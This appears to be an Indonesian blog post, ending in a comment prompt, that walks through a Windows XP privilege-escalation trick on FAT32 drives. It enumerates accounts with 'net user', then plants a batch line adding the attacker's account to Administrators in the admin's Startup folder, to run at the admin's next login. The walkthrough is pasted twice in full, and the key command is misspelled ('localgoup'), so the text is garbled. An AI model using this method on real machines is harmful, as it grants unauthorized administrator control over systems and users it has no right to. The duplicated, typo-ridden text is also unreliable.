//—< Metode exploitasi:
Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:
C:\Documents and Settings\Administrator\
Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.
//—< Exploitasi
1. MELIHAT USER TERDAFTAR
——————————
C:\DOCUME~1\spyro>net user
User accounts for \\spyroNET
—————————————————————————
Administrator Guest spyro
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.
MELIHAT HAK AKSES USER
———————————————-
C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User’s comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:
net localgoup Administrators spyro /add
Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup
Tunggu sang admin untuk login… setelah itu, level kita sudah setingkat admin
Windows XP yang file systemnya adalah Fat32 memperbolehkan user biasa untuk mengakses direktory home dari admin yang (biasanya) terletak pada lokasi berikut:
C:\Documents and Settings\Administrator\
Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.
//—< Exploitasi
1. MELIHAT USER TERDAFTAR
——————————
C:\DOCUME~1\spyro>net user
User accounts for \\spyroNET
—————————————————————————
Administrator Guest spyro
HelpAssistant SUPPORT_388945a0 SuperUser
The command completed successfully.
MELIHAT HAK AKSES USER
———————————————-
C:\DOCUME~1\spyro>net user SuperUser
User name SuperUser
Full Name
Comment
User’s comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/12/2004 3:38 AM
Password expires Never
Password changeable 7/12/2004 3:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/12/2004 11:16 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:
net localgoup Administrators spyro /add
Simpan di lokasi berikut:
C:\Documents and Settings\SuperUser\Start Menu\Programs\Startup
Tunggu sang admin untuk login… setelah itu, level kita sudah setingkat admin
0 komentar:
Posting Komentar